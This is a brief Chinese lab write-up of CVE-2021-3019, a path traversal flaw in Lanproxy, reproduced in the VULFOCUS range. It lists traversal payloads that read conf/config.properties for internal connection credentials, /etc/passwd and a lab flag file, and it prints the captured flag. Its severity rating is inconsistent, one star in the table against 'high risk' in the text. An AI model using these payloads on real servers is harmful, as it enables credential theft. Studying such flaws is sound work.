1.1漏洞描述
|------|---------------|
| 漏洞编号 | CVE-2021-3019 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |
描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
1.2漏洞等级
高危
1.3影响版本
Lanproxy
1.4漏洞复现
1.4.1.基础环境
|----|-----------|
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
| | |
1.4.2.前提
-
网站后台地址:
-
后台管理账密:
-
后台登录地址 :
1.5深度利用
1.5.1漏洞点
/../conf/config.properties
查看内部网连接的凭据
查看/etc/passwd
../../../../../etc/passwd
查看tmp/flag
../../../../../tmp/flag
拿到flag
flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
- 升级
- 打补丁
- 上设备